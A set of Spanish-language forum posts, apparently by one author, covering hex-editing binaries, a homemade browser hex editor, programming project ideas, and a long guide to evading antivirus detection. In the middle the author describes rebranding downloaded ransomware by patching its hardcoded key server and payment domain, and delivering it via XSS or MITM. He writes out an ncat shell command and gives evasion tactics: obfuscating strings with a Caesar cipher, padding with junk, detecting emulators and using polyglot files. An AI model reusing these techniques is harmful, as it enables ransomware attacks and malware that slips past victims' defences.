Yo uso Yumi

Usa radare2/cutter. Es lo mismo, radare2 va por linea de comandos y cutter por interfaz gráfica.

Es mejor que te mires una guía de como funciona.

La forma más directa en terminal Linux es:
rabin2 -zzzz tuArchivo.ORZ > strings.txt
Ahí buscas las direcciones de memoria, el tipo exacto de codificación de cada string, etc. Mírate bien como funciónan las codificaciones que se usan.

Con esa info puedes usar un comando para dumpear el archivo en hexadecimal, lo modificas y lo rebuildeas a ORZ:
xxd tuArchivo.ORZ > dumpDeTuArchivo
vim dumpDeTuArchivo
lo editas con vim, nano o el que quieras.
xxd -r dumpDeTuArchivo tuNuevoArchivo.ORZ

Si te manejas puedes usar un programa que llevo 2 días programando:
http://stringmanolo.000webhostapp.com/JEX-2.html

Aún no le puse las direcciones de memoria. Utilízalo conjuntamente con un conversor de hex a ascii o la codificación que sea. Para usarlo editas el hex y le das a compilar y listo. Añádele la extensión en la descarga para que los programas que usas te lo reconozcan.

Te dejo una lista de ideas.

1. Un Portfolio.

2. Tu Sitio Web en un hosting.

3. Tracker Web

4. Algo con gráficas. Puedes escrapear datos del Coronavirus actualizados. Hazlo sin libs o tienes d3.js entre otras.

5. Juego de cualquier tipo, plataformas son fáciles, o de preguntas tipo 50x15 o mira alfgún concurso de la tele y lo programas.

6. Juego de música, un instrumento o algo.

7. Organizador de info

8. Novela gráfica 3D tipo RPG con webGL/threejs, canvas o graficos en svg/html

9. Proxyweb

10 App test-to-speach

Un criptominer en webassembler y javascript.

Ando haciendo un exploit kit en javascript. Os dejo un de los componentes que estoy haciendo por si os es útil.

Es un editor de hexadecimal que permite generar binarios.

Cómo funciona?
-Abres la página/programa. (Funciona 100% offline)
-Seleccionas tu archivo. (Por ejemplo un binario de linux)
-Chequeas lo que quieras modificar del hex. (Tienes el ASCII como referencia.
-Modificas el hex y le das a Compile.
-Se descargará el nuevo binario.
-Lo ejecutas.

Codigo en github
Live

Ejemplo 1:
Me descargo un ransomware compilado por la red.
Lo subo a la página.
En el ransomware se pide la llave a una IP hardcodeada, y tiene hardcodeada una página en donde hacer el pago.
Busco esos 2 strings en el ASCII.
Busco la equivalencia en el HEX.
Modifico el HEX para poner mi IP y mi dominio malicioso.
Le doy a compilar y ya tengo el Binario listo.

Combínalo con un XSS o MITM para substituir una descarga legítima por tu binario.

El principal mecanismo de los antivirus son las firmas.

Sin complicar mucho la historia viene siendo lo siguiente.
Imagínate el código en C:
system("ncat -l -k 127.0.0.1 9091 -e /bin/sh");

El av tendrá en su base de datos:
2D65 202F 6269 6E2F 7368

Entonces chequeará todo el binario e irá contrastando según el tipo de binario, arquitectura... Si encuentra el hex significa que en el binario hay un string -e /bin/sh
Quizás con eso no salte. Pero revisando también encuentra el comando ncat, una ip que no tiene en su base de datos, un programa no conocido...
Irá subiendo la puntuación de peligrosidad y llegado el momento cancelará la ejecución y pasará a cuarentena.

Pasa lo propio con componentes comunes. Por ejemplo un módulo de un programa de python cuya función es escalar privilegios puede tener un hash por ejemplo md5 en la base de datos del antivirus y al encontrarlo en tu programa saben que estás usando un componente malicioso.

Esto obviamente es lo más sencillo y rápido en cuanto a detección se refiere.

Otro método de detección común es el checksum. Puede por ejemplo aplicar un checksum a un archivo, componente... y si intentas modificar algún archivo de la instalación el checksum no coincidirá y se intentará seguir el árbol de procesos para saber que software es el causante de los cambios.
Lo mismo pasa con programas populares. Se puede tener en la base de datos del av muchas piezas esenciales del producto para detectar cambios.

Algo gracioso de estos métodos de detección es que el cambio de un solo byte en tu malware puede tirarles al traste la detección xDDD
Hay un video muy cachondo por ahí de esto. Pilla un rootkit en github, lo compilan lo mandan a virustotal y lo detecta 30av. Le cambia un 20 por un 21 y solo lo detectan 2 av xD

Otro método de detección común creo que lo comentaste tú en otro post y es el control flow. Básicamente miran las entradas y salidas y en base a ello hacen la detección. También las llamadas para saber desde donde se llama y a que. En estos casos por mucho que modiques los bloques de código ya te tienen el malware fichado.

El método más sencillo para evitar las detecciones es divir el código en trozos para saber exactamente que es lo que se detecta. Sabiendo eso, automáticamente puedes deducir los posibles métodos de detección que usa el AV para utilizar lo que se te ocurra para evadirlo.
No tiene mucha ciencia, metes el archivo a trozos en una carpeta y le pasas el AV.

Otro método es analizar el propio AV ya sea para evadirlo o para cargártelo. Esto ya es más avanzado pero hay mucho material disclosed por ahí.

Otro es engordar el malware con basura, meterle bucles de minutos, etc. Muchos AV lo dejarán estar.

Las fechas también son importantes. Hay malware del 2000 que se sigue descargando y tienen la fecha de buildeo original. Algunos AV lo usan para confirmar que se trata de X malware.

Los intérpretes a veces son muy útiles. Puedes romper todo el análisis estático solo con un intérprete y código cifrado en texto.

En el caso de análisis dinámico se usan emuladores, ya que si no, podrían infectar el sistema corriendo malware para su análisis. Esto quiere decir que simulan el entorno, pero obivamente hay incongruencias entre el host emulado y la máquina real.
Puedes detectar emuladores programáticamente cargando componentes y librerías no implementadas.

También puedes jugar con instrucciones poco documentadas para cargarte el dissasembles del av.

Un método muy chulo son los polyglotas. Puedes confundir a los av que nk sabrán exactamente que tipo de archivo es.

Por ponerte un ejemplo de esto, un usuario puede abrie de forma determinada con Chrome los archivos pdf. Ese archivo puede a su vez ser un archivo html, un ejecutable y demás. No necesariamente el antivirus sabe como el usuario va a interpretar el archivo. Esto da mucho juego con javascript, ya que se puede ejecutar en whs, navegadores, lectores de pdf, lectores de html, programas de oficina...

Para probar tus creaciones deberías tener una máquina 100% offline. Si lls andas subiendo los acabarán analizando y añadiendo a la lista. Lo mejor es que te descarges un montón de av y los uses offline para saltártelos.

Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.

Estoy abriendo binarios con html e imprimiendo el hex equivalente. También quiero añador la versión en string.

El problema lo tengo principalmente intentando editar el hex tras escribirlo en pantalla. Lo metí en un div con contentEditable pero al pulsar doble click se freezea por el tamaño del archivo.

Sabeis como puedo dejar al usuario editar el HexDump en el navegador si que pete por tamaño?

Solo se me ocurre dividir en muchos trozos pequeños editables, pero igual hay alguna forma más "correcta" o eficiente de trabajar con archivos muy grandes de texto.

No puedes aprender seguridad web si no sabes montar un servidor, una pagina, como funciona todo lo relacionado. Quemar sistema linux, instalar software en linux, servidores, ips, lenguajes...

Crea una página web, monta tu servidor linux para alojarla ya sea directamente en el pc o con máquina virtual, ponlo live para que la puedan ver tus amigos.